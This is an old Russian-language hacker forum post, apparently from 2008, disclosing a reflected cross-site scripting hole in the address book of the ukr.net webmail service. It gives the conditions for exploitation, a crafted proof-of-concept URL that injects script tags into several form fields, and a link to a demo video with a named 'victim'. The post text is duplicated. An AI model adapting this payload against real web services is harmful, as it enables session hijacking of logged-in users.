Dimi4
02.10.2008, 17:24
Хакеры! Там нет ничево интересного! просьба не смотреть!
Всем привет. Это мое первое видео :) . Сегодня мною была обнаружена пассивная хсс на сервисе ukr.net - http://freemail.ukr.net
Причина: Отсутствие\плохая фильтрация в скрипте "аddressbook"
Условия: Жертва должна быть залогинена. Жертва должна пройти по специально сформированой ссылке.
Пример:
_ttp://freemail.ukr.net/q/addressbook?mode=edit&id=&LastName="><script>alert(/xek/)</script>&FirstName=%22%3E%3Cscript%3Ealert%28%2Fby+%2F%29%3 C%2Fscript%3E&NickName=%22%3E%3Cscript%3Ealert%28%2Fxek+by+Dimi4 %2F%29%3C%2Fscript%3E&Email=%22%3E%3Cscript%3Ealert%28%2Fxek+by+Dimi4%2F %29%3C%2Fscript%3E&MobilePhone=%22%3E%3Cscript%3Ealert%28%2FDimi4%2F% 29%3C%2Fscript%3E&submit=%C4%EE%E1%E0%E2%E8%F2%FC
Видео:
http://rapidshare.com/files/150250737/ukr.net.rar.html
В роли жертвы - T-Rey
П.С. Пошол отправлять на video.antichat.net :)
П.П.С Слишком долгая ссылка? www.tiny.cc
(c) Dimi4
Всем привет. Это мое первое видео :) . Сегодня мною была обнаружена пассивная хсс на сервисе ukr.net - http://freemail.ukr.net
Причина: Отсутствие\плохая фильтрация в скрипте "аddressbook"
Условия: Жертва должна быть залогинена. Жертва должна пройти по специально сформированой ссылке.
Пример:
_ttp://freemail.ukr.net/q/addressbook?mode=edit&id=&LastName="><script>alert(/xek/)</script>&FirstName=%22%3E%3Cscript%3Ealert%28%2Fby+%2F%29%3 C%2Fscript%3E&NickName=%22%3E%3Cscript%3Ealert%28%2Fxek+by+Dimi4 %2F%29%3C%2Fscript%3E&Email=%22%3E%3Cscript%3Ealert%28%2Fxek+by+Dimi4%2F %29%3C%2Fscript%3E&MobilePhone=%22%3E%3Cscript%3Ealert%28%2FDimi4%2F% 29%3C%2Fscript%3E&submit=%C4%EE%E1%E0%E2%E8%F2%FC
Видео:
http://rapidshare.com/files/150250737/ukr.net.rar.html
В роли жертвы - T-Rey
П.С. Пошол отправлять на video.antichat.net :)
П.П.С Слишком долгая ссылка? www.tiny.cc
(c) Dimi4